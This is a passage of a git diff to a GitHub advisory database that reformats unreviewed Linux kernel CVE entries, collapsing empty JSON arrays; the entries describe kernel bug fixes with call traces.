101.525346] sock_wfree+0x9c/0xa0\n [ 101.525353] unix_destruct_scm+0x7b/0xa0\n [ 101.525358] skb_release_head_state+0x40/0x90\n [ 101.525362] skb_release_all+0xe/0x30\n [ 101.525364] napi_consume_skb+0x57/0x160\n [ 101.525367] igc_poll+0xb7/0xc80 [igc]\n [ 101.525376] ? sched_clock+0x5/0x10\n [ 101.525381] ? sched_clock_cpu+0xe/0x100\n [ 101.525385] net_rx_action+0x14c/0x410\n [ 101.525388] __do_softirq+0xe9/0x2f4\n [ 101.525391] __local_bh_enable_ip+0xe3/0x110\n [ 101.525395] ? irq_finalize_oneshot.part.47+0xe0/0xe0\n [ 101.525398] irq_forced_thread_fn+0x6a/0x80\n [ 101.525401] irq_thread+0xe8/0x180\n [ 101.525403] ? wake_threads_waitq+0x30/0x30\n [ 101.525406] ? irq_thread_check_affinity+0xd0/0xd0\n [ 101.525408] kthread+0x183/0x1a0\n [ 101.525412] ? kthread_park+0x80/0x80\n [ 101.525415] ret_from_fork+0x22/0x30", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-g74p-v363-hqxr/GHSA-g74p-v363-hqxr.json b/advisories/unreviewed/2024/05/GHSA-g74p-v363-hqxr/GHSA-g74p-v363-hqxr.json index ece69afd73f..9f06567026d 100644 --- a/advisories/unreviewed/2024/05/GHSA-g74p-v363-hqxr/GHSA-g74p-v363-hqxr.json +++ b/advisories/unreviewed/2024/05/GHSA-g74p-v363-hqxr/GHSA-g74p-v363-hqxr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-g7gx-qmj4-gxrc/GHSA-g7gx-qmj4-gxrc.json b/advisories/unreviewed/2024/05/GHSA-g7gx-qmj4-gxrc/GHSA-g7gx-qmj4-gxrc.json index cc9de39ebbd..248cfedb26e 100644 --- a/advisories/unreviewed/2024/05/GHSA-g7gx-qmj4-gxrc/GHSA-g7gx-qmj4-gxrc.json +++ b/advisories/unreviewed/2024/05/GHSA-g7gx-qmj4-gxrc/GHSA-g7gx-qmj4-gxrc.json @@ -7,12 +7,8 @@ "CVE-2021-47287" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndriver core: auxiliary bus: Fix memory leak when driver_register() fail\n\nIf driver_register() returns with error we need to free the memory\nallocated for auxdrv->driver.name before returning from\n__auxiliary_driver_register()", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-g7hp-974g-6wg8/GHSA-g7hp-974g-6wg8.json b/advisories/unreviewed/2024/05/GHSA-g7hp-974g-6wg8/GHSA-g7hp-974g-6wg8.json index fda36542335..5e05a0dc260 100644 --- a/advisories/unreviewed/2024/05/GHSA-g7hp-974g-6wg8/GHSA-g7hp-974g-6wg8.json +++ b/advisories/unreviewed/2024/05/GHSA-g7hp-974g-6wg8/GHSA-g7hp-974g-6wg8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-g97v-hf56-5335/GHSA-g97v-hf56-5335.json b/advisories/unreviewed/2024/05/GHSA-g97v-hf56-5335/GHSA-g97v-hf56-5335.json index 3788e007351..4986a9ae0b5 100644 --- a/advisories/unreviewed/2024/05/GHSA-g97v-hf56-5335/GHSA-g97v-hf56-5335.json +++ b/advisories/unreviewed/2024/05/GHSA-g97v-hf56-5335/GHSA-g97v-hf56-5335.json @@ -7,12 +7,8 @@ "CVE-2021-47258" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: core: Fix error handling of scsi_host_alloc()\n\nAfter device is initialized via device_initialize(), or its name is set via\ndev_set_name(), the device has to be freed via put_device(). Otherwise\ndevice name will be leaked because it is allocated dynamically in\ndev_set_name().\n\nFix the leak by replacing kfree() with put_device(). Since\nscsi_host_dev_release() properly handles IDA and kthread removal, remove\nspecial-casing these from the error handling as well.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-gg86-5h5f-jrwx/GHSA-gg86-5h5f-jrwx.json b/advisories/unreviewed/2024/05/GHSA-gg86-5h5f-jrwx/GHSA-gg86-5h5f-jrwx.json index 0a37dccdcb1..1a8050af410 100644 --- a/advisories/unreviewed/2024/05/GHSA-gg86-5h5f-jrwx/GHSA-gg86-5h5f-jrwx.json +++ b/advisories/unreviewed/2024/05/GHSA-gg86-5h5f-jrwx/GHSA-gg86-5h5f-jrwx.json @@ -7,12 +7,8 @@ "CVE-2021-47253" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix potential memory leak in DMUB hw_init\n\n[Why]\nOn resume we perform DMUB hw_init which allocates memory:\ndm_resume->dm_dmub_hw_init->dc_dmub_srv_create->kzalloc\nThat results in memory leak in suspend/resume scenarios.\n\n[How]\nAllocate memory for the DC wrapper to DMUB only if it was not\nallocated before.\nNo need to reallocate it on suspend/resume.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-gjqw-82j7-2f3q/GHSA-gjqw-82j7-2f3q.json b/advisories/unreviewed/2024/05/GHSA-gjqw-82j7-2f3q/GHSA-gjqw-82j7-2f3q.json index 3666fd44666..7d00053bbc8 100644 --- a/advisories/unreviewed/2024/05/GHSA-gjqw-82j7-2f3q/GHSA-gjqw-82j7-2f3q.json +++ b/advisories/unreviewed/2024/05/GHSA-gjqw-82j7-2f3q/GHSA-gjqw-82j7-2f3q.json @@ -7,12 +7,8 @@ "CVE-2024-27429" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetrom: Fix a data-race around sysctl_netrom_obsolescence_count_initialiser\n\nWe need to protect the reader reading the sysctl value\nbecause the value can be changed concurrently.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-gp7w-fhxq-93jr/GHSA-gp7w-fhxq-93jr.json b/advisories/unreviewed/2024/05/GHSA-gp7w-fhxq-93jr/GHSA-gp7w-fhxq-93jr.json index 08e070dd701..fe187bc7828 100644 --- a/advisories/unreviewed/2024/05/GHSA-gp7w-fhxq-93jr/GHSA-gp7w-fhxq-93jr.json +++ b/advisories/unreviewed/2024/05/GHSA-gp7w-fhxq-93jr/GHSA-gp7w-fhxq-93jr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-gr8g-fg7p-9238/GHSA-gr8g-fg7p-9238.json b/advisories/unreviewed/2024/05/GHSA-gr8g-fg7p-9238/GHSA-gr8g-fg7p-9238.json index e9c5ba480f0..bfaa3d3ab90 100644 --- a/advisories/unreviewed/2024/05/GHSA-gr8g-fg7p-9238/GHSA-gr8g-fg7p-9238.json +++ b/advisories/unreviewed/2024/05/GHSA-gr8g-fg7p-9238/GHSA-gr8g-fg7p-9238.json @@ -7,12 +7,8 @@ "CVE-2021-47304" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: fix tcp_init_transfer() to not reset icsk_ca_initialized\n\nThis commit fixes a bug (found by syzkaller) that could cause spurious\ndouble-initializations for congestion control modules, which could cause\nmemory leaks or other problems for congestion control modules (like CDG)\nthat allocate memory in their init functions.\n\nThe buggy scenario constructed by syzkaller was something like:\n\n(1) create a TCP socket\n(2) initiate a TFO connect via sendto()\n(3) while socket is in TCP_SYN_SENT, call setsockopt(TCP_CONGESTION),\n which calls:\n tcp_set_congestion_control() ->\n tcp_reinit_congestion_control() ->\n tcp_init_congestion_control()\n(4) receive ACK, connection is established, call tcp_init_transfer(),\n set icsk_ca_initialized=0 (without first calling cc->release()),\n call tcp_init_congestion_control() again.\n\nNote that in this sequence tcp_init_congestion_control() is called\ntwice without a cc->release() call in between. Thus, for CC modules\nthat allocate memory in their init() function, e.g, CDG, a memory leak\nmay occur. The syzkaller tool managed to find a reproducer that\ntriggered such a leak in CDG.\n\nThe bug was introduced when that commit 8919a9b31eb4 (\"tcp: Only init\ncongestion control if not initialized already\")\nintroduced icsk_ca_initialized and set icsk_ca_initialized to 0 in\ntcp_init_transfer(), missing the possibility for a sequence like the\none above, where a process could call setsockopt(TCP_CONGESTION) in\nstate TCP_SYN_SENT (i.e. after the connect() or TFO open sendmsg()),\nwhich would call tcp_init_congestion_control(). It did not intend to\nreset any initialization that the user had already explicitly made;\nit just missed the possibility of that particular sequence (which\nsyzkaller managed to find).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-grwp-8243-xpjh/GHSA-grwp-8243-xpjh.json b/advisories/unreviewed/2024/05/GHSA-grwp-8243-xpjh/GHSA-grwp-8243-xpjh.json index ebd5259053d..968cd2fadee 100644 --- a/advisories/unreviewed/2024/05/GHSA-grwp-8243-xpjh/GHSA-grwp-8243-xpjh.json +++ b/advisories/unreviewed/2024/05/GHSA-grwp-8243-xpjh/GHSA-grwp-8243-xpjh.json @@ -7,12 +7,8 @@ "CVE-2021-47251" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmac80211: fix skb length check in ieee80211_scan_rx()\n\nReplace hard-coded compile-time constants for header length check\nwith dynamic determination based on the frame type. Otherwise, we\nhit a validation WARN_ON in cfg80211 later.\n\n[style fixes, reword commit message]", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-gx2j-3fvm-rqj3/GHSA-gx2j-3fvm-rqj3.json b/advisories/unreviewed/2024/05/GHSA-gx2j-3fvm-rqj3/GHSA-gx2j-3fvm-rqj3.json index 3739e6e759c..51273edd6c8 100644 --- a/advisories/unreviewed/2024/05/GHSA-gx2j-3fvm-rqj3/GHSA-gx2j-3fvm-rqj3.json +++ b/advisories/unreviewed/2024/05/GHSA-gx2j-3fvm-rqj3/GHSA-gx2j-3fvm-rqj3.json @@ -7,12 +7,8 @@ "CVE-2021-47420" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: fix a potential ttm->sg memory leak\n\nMemory is allocated for ttm->sg by kmalloc in kfd_mem_dmamap_userptr,\nbut isn't freed by kfree in kfd_mem_dmaunmap_userptr. Free it!", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-h423-6g7m-qpqq/GHSA-h423-6g7m-qpqq.json b/advisories/unreviewed/2024/05/GHSA-h423-6g7m-qpqq/GHSA-h423-6g7m-qpqq.json index 597e8e8fe67..b9bd2398b2a 100644 --- a/advisories/unreviewed/2024/05/GHSA-h423-6g7m-qpqq/GHSA-h423-6g7m-qpqq.json +++ b/advisories/unreviewed/2024/05/GHSA-h423-6g7m-qpqq/GHSA-h423-6g7m-qpqq.json @@ -7,12 +7,8 @@ "CVE-2021-47222" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix vlan tunnel dst refcnt when egressing\n\nThe egress tunnel code uses dst_clone() and directly sets the result\nwhich is wrong because the entry might have 0 refcnt or be already deleted,\ncausing number of problems. It also triggers the WARN_ON() in dst_hold()[1]\nwhen a refcnt couldn't be taken. Fix it by using dst_hold_safe() and\nchecking if a reference was actually taken before setting the dst.\n\n[1] dmesg WARN_ON log and following refcnt errors\n WARNING: CPU: 5 PID: 38 at include/net/dst.h:230 br_handle_egress_vlan_tunnel+0x10b/0x134 [bridge]\n Modules linked in: 8021q garp mrp bridge stp llc bonding ipv6 virtio_net\n CPU: 5 PID: 38 Comm: ksoftirqd/5 Kdump: loaded Tainted: G W 5.13.0-rc3+ #360\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-1.fc33 04/01/2014\n RIP: 0010:br_handle_egress_vlan_tunnel+0x10b/0x134 [bridge]\n Code: e8 85 bc 01 e1 45 84 f6 74 90 45 31 f6 85 db 48 c7 c7 a0 02 19 a0 41 0f 94 c6 31 c9 31 d2 44 89 f6 e8 64 bc 01 e1 85 db 75 02 <0f> 0b 31 c9 31 d2 44 89 f6 48 c7 c7 70 02 19 a0 e8 4b bc 01 e1 49\n RSP: 0018:ffff8881003d39e8 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000\n RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffffffffa01902a0\n RBP: ffff8881040c6700 R08: 0000000000000000 R09: 0000000000000001\n R10: 2ce93d0054fe0d00 R11: 54fe0d00000e0000 R12: ffff888109515000\n R13: 0000000000000000 R14: 0000000000000001 R15: 0000000000000401\n FS: 0000000000000000(0000) GS:ffff88822bf40000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f42ba70f030 CR3: 0000000109926000 CR4: 00000000000006e0\n Call Trace:\n br_handle_vlan+0xbc/0xca [bridge]\n __br_forward+0x23/0x164 [bridge]\n deliver_clone+0x41/0x48 [bridge]\n br_handle_frame_finish+0x36f/0x3aa [bridge]\n ? skb_dst+0x2e/0x38 [bridge]\n ? br_handle_ingress_vlan_tunnel+0x3e/0x1c8 [bridge]\n ? br_handle_frame_finish+0x3aa/0x3aa [bridge]\n br_handle_frame+0x2c3/0x377 [bridge]\n ? __skb_pull+0x33/0x51\n ? vlan_do_receive+0x4f/0x36a\n ? br_handle_frame_finish+0x3aa/0x3aa [bridge]\n __netif_receive_skb_core+0x539/0x7c6\n ? __list_del_entry_valid+0x16e/0x1c2\n __netif_receive_skb_list_core+0x6d/0xd6\n netif_receive_skb_list_internal+0x1d9/0x1fa\n gro_normal_list+0x22/0x3e\n dev_gro_receive+0x55b/0x600\n ? detach_buf_split+0x58/0x140\n napi_gro_receive+0x94/0x12e\n virtnet_poll+0x15d/0x315 [virtio_net]\n __napi_poll+0x2c/0x1c9\n net_rx_action+0xe6/0x1fb\n __do_softirq+0x115/0x2d8\n run_ksoftirqd+0x18/0x20\n smpboot_thread_fn+0x183/0x19c\n ? smpboot_unregister_percpu_thread+0x66/0x66\n kthread+0x10a/0x10f\n ? kthread_mod_delayed_work+0xb6/0xb6\n ret_from_fork+0x22/0x30\n ---[ end trace 49f61b07f775fd2b ]---\n dst_release: dst:00000000c02d677a refcnt:-1\n dst_release underflow", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-hgvv-c4m6-65wv/GHSA-hgvv-c4m6-65wv.json b/advisories/unreviewed/2024/05/GHSA-hgvv-c4m6-65wv/GHSA-hgvv-c4m6-65wv.json index 97d12c3796a..a1f148f3b9c 100644 --- a/advisories/unreviewed/2024/05/GHSA-hgvv-c4m6-65wv/GHSA-hgvv-c4m6-65wv.json +++ b/advisories/unreviewed/2024/05/GHSA-hgvv-c4m6-65wv/GHSA-hgvv-c4m6-65wv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-hw2j-3fc3-hf74/GHSA-hw2j-3fc3-hf74.json b/advisories/unreviewed/2024/05/GHSA-hw2j-3fc3-hf74/GHSA-hw2j-3fc3-hf74.json index e76e71cdf15..d4bc73a46b3 100644 --- a/advisories/unreviewed/2024/05/GHSA-hw2j-3fc3-hf74/GHSA-hw2j-3fc3-hf74.json +++ b/advisories/unreviewed/2024/05/GHSA-hw2j-3fc3-hf74/GHSA-hw2j-3fc3-hf74.json @@ -7,12 +7,8 @@ "CVE-2021-47286" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbus: mhi: core: Validate channel ID when processing command completions\n\nMHI reads the channel ID from the event ring element sent by the\ndevice which can be any value between 0 and 255. In order to\nprevent any out of bound accesses, add a check against the maximum\nnumber of channels supported by the controller and those channels\nnot configured yet so as to skip processing of that event ring\nelement.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-hxrc-p4fv-gc5g/GHSA-hxrc-p4fv-gc5g.json b/advisories/unreviewed/2024/05/GHSA-hxrc-p4fv-gc5g/GHSA-hxrc-p4fv-gc5g.json index 9b37c293bbd..196e7b630d1 100644 --- a/advisories/unreviewed/2024/05/GHSA-hxrc-p4fv-gc5g/GHSA-hxrc-p4fv-gc5g.json +++ b/advisories/unreviewed/2024/05/GHSA-hxrc-p4fv-gc5g/GHSA-hxrc-p4fv-gc5g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-hxrw-3c72-p9hc/GHSA-hxrw-3c72-p9hc.json b/advisories/unreviewed/2024/05/GHSA-hxrw-3c72-p9hc/GHSA-hxrw-3c72-p9hc.json index fbe24baeab1..d898004405a 100644 --- a/advisories/unreviewed/2024/05/GHSA-hxrw-3c72-p9hc/GHSA-hxrw-3c72-p9hc.json +++ b/advisories/unreviewed/2024/05/GHSA-hxrw-3c72-p9hc/GHSA-hxrw-3c72-p9hc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-j8g9-5p8g-4f3x/GHSA-j8g9-5p8g-4f3x.json b/advisories/unreviewed/2024/05/GHSA-j8g9-5p8g-4f3x/GHSA-j8g9-5p8g-4f3x.json index 8184ebe7ca4..31607e003f9 100644 --- a/advisories/unreviewed/2024/05/GHSA-j8g9-5p8g-4f3x/GHSA-j8g9-5p8g-4f3x.json +++ b/advisories/unreviewed/2024/05/GHSA-j8g9-5p8g-4f3x/GHSA-j8g9-5p8g-4f3x.json @@ -7,12 +7,8 @@ "CVE-2021-47306" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: fddi: fix UAF in fza_probe\n\nfp is netdev private data and it cannot be\nused after free_netdev() call. Using fp after free_netdev()\ncan cause UAF bug. Fix it by moving free_netdev() after error message.\n\nTURBOchannel adapter\")", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-jpfh-4v99-5m27/GHSA-jpfh-4v99-5m27.json b/advisories/unreviewed/2024/05/GHSA-jpfh-4v99-5m27/GHSA-jpfh-4v99-5m27.json index 661abb6115c..3188fffe73c 100644 --- a/advisories/unreviewed/2024/05/GHSA-jpfh-4v99-5m27/GHSA-jpfh-4v99-5m27.json +++ b/advisories/unreviewed/2024/05/GHSA-jpfh-4v99-5m27/GHSA-jpfh-4v99-5m27.json @@ -7,12 +7,8 @@ "CVE-2021-47272" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: gadget: Bail from dwc3_gadget_exit() if dwc->gadget is NULL\n\nThere exists a possible scenario in which dwc3_gadget_init() can fail:\nduring during host -> peripheral mode switch in dwc3_set_mode(), and\na pending gadget driver fails to bind. Then, if the DRD undergoes\nanother mode switch from peripheral->host the resulting\ndwc3_gadget_exit() will attempt to reference an invalid and dangling\ndwc->gadget pointer as well as call dma_free_coherent() on unmapped\nDMA pointers.\n\nThe exact scenario can be reproduced as follows:\n - Start DWC3 in peripheral mode\n - Configure ConfigFS gadget with FunctionFS instance (or use g_ffs)\n - Run FunctionFS userspace application (open EPs, write descriptors, etc)\n - Bind gadget driver to DWC3's UDC\n - Switch DWC3 to host mode\n => dwc3_gadget_exit() is called. usb_del_gadget() will put the\n\tConfigFS driver instance on the gadget_driver_pending_list\n - Stop FunctionFS application (closes the ep files)\n - Switch DWC3 to peripheral mode\n => dwc3_gadget_init() fails as usb_add_gadget() calls\n\tcheck_pending_gadget_drivers() and attempts to rebind the UDC\n\tto the ConfigFS gadget but fails with -19 (-ENODEV) because the\n\tFFS instance is not in FFS_ACTIVE state (userspace has not\n\tre-opened and written the descriptors yet, i.e. desc_ready!=0).\n - Switch DWC3 back to host mode\n => dwc3_gadget_exit() is called again, but this time dwc->gadget\n\tis invalid.\n\nAlthough it can be argued that userspace should take responsibility\nfor ensuring that the FunctionFS application be ready prior to\nallowing the composite driver bind to the UDC, failure to do so\nshould not result in a panic from the kernel driver.\n\nFix this by setting dwc->gadget to NULL in the failure path of\ndwc3_gadget_init() and add a check to dwc3_gadget_exit() to bail out\nunless the gadget pointer is valid.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-jx29-4rmr-vrj4/GHSA-jx29-4rmr-vrj4.json b/advisories/unreviewed/2024/05/GHSA-jx29-4rmr-vrj4/GHSA-jx29-4rmr-vrj4.json index 8df92ba14ac..cca9027e888 100644 --- a/advisories/unreviewed/2024/05/GHSA-jx29-4rmr-vrj4/GHSA-jx29-4rmr-vrj4.json +++ b/advisories/unreviewed/2024/05/GHSA-jx29-4rmr-vrj4/GHSA-jx29-4rmr-vrj4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-mjhg-c85c-62fv/GHSA-mjhg-c85c-62fv.json b/advisories/unreviewed/2024/05/GHSA-mjhg-c85c-62fv/GHSA-mjhg-c85c-62fv.json index 57a5039493a..b4f01b6ac21 100644 --- a/advisories/unreviewed/2024/05/GHSA-mjhg-c85c-62fv/GHSA-mjhg-c85c-62fv.json +++ b/advisories/unreviewed/2024/05/GHSA-mjhg-c85c-62fv/GHSA-mjhg-c85c-62fv.json @@ -7,12 +7,8 @@ "CVE-2021-47265" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA: Verify port when creating flow rule\n\nValidate port value provided by the user and with that remove no longer\nneeded validation by the driver. The missing check in the mlx5_ib driver\ncould cause to the below oops.\n\nCall trace:\n _create_flow_rule+0x2d4/0xf28 [mlx5_ib]\n mlx5_ib_create_flow+0x2d0/0x5b0 [mlx5_ib]\n ib_uverbs_ex_create_flow+0x4cc/0x624 [ib_uverbs]\n ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0xd4/0x150 [ib_uverbs]\n ib_uverbs_cmd_verbs.isra.7+0xb28/0xc50 [ib_uverbs]\n ib_uverbs_ioctl+0x158/0x1d0 [ib_uverbs]\n do_vfs_ioctl+0xd0/0xaf0\n ksys_ioctl+0x84/0xb4\n __arm64_sys_ioctl+0x28/0xc4\n el0_svc_common.constprop.3+0xa4/0x254\n el0_svc_handler+0x84/0xa0\n el0_svc+0x10/0x26c\n Code: b9401260 f9615681 51000400 8b001c20 (f9403c1a)", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-mrm7-vh23-g98v/GHSA-mrm7-vh23-g98v.json b/advisories/unreviewed/2024/05/GHSA-mrm7-vh23-g98v/GHSA-mrm7-vh23-g98v.json index 6180e1e0c14..11b80303160 100644 --- a/advisories/unreviewed/2024/05/GHSA-mrm7-vh23-g98v/GHSA-mrm7-vh23-g98v.json +++ b/advisories/unreviewed/2024/05/GHSA-mrm7-vh23-g98v/GHSA-mrm7-vh23-g98v.json @@ -7,12 +7,8 @@ "CVE-2021-47292" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix memleak in io_init_wq_offload()\n\nI got memory leak report when doing fuzz test:\n\nBUG: memory leak\nunreferenced object 0xffff888107310a80 (size 96):\ncomm \"syz-executor.6\", pid 4610, jiffies 4295140240 (age 20.135s)\nhex dump (first 32 bytes):\n01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n00 00 00 00 ad 4e ad de ff ff ff ff 00 00 00 00 .....N..........\nbacktrace:\n[<000000001974933b>] kmalloc include/linux/slab.h:591 [inline]\n[<000000001974933b>] kzalloc include/linux/slab.h:721 [inline]\n[<000000001974933b>] io_init_wq_offload fs/io_uring.c:7920 [inline]\n[<000000001974933b>] io_uring_alloc_task_context+0x466/0x640 fs/io_uring.c:7955\n[<0000000039d0800d>] __io_uring_add_tctx_node+0x256/0x360 fs/io_uring.c:9016\n[<000000008482e78c>] io_uring_add_tctx_node fs/io_uring.c:9052 [inline]\n[<000000008482e78c>] __do_sys_io_uring_enter fs/io_uring.c:9354 [inline]\n[<000000008482e78c>] __se_sys_io_uring_enter fs/io_uring.c:9301 [inline]\n[<000000008482e78c>] __x64_sys_io_uring_enter+0xabc/0xc20 fs/io_uring.c:9301\n[<00000000b875f18f>] do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n[<00000000b875f18f>] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80\n[<000000006b0a8484>] entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nCPU0 CPU1\nio_uring_enter io_uring_enter\nio_uring_add_tctx_node io_uring_add_tctx_node\n__io_uring_add_tctx_node __io_uring_add_tctx_node\nio_uring_alloc_task_context io_uring_alloc_task_context\nio_init_wq_offload io_init_wq_offload\nhash = kzalloc hash = kzalloc\nctx->hash_map = hash ctx->hash_map = hash <- one of the hash is leaked\n\nWhen calling io_uring_enter() in parallel, the 'hash_map' will be leaked,\nadd uring_lock to protect 'hash_map'.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-mv9f-845w-2cgm/GHSA-mv9f-845w-2cgm.json b/advisories/unreviewed/2024/05/GHSA-mv9f-845w-2cgm/GHSA-mv9f-845w-2cgm.json index 8e4d9bdf647..5fe99d09389 100644 --- 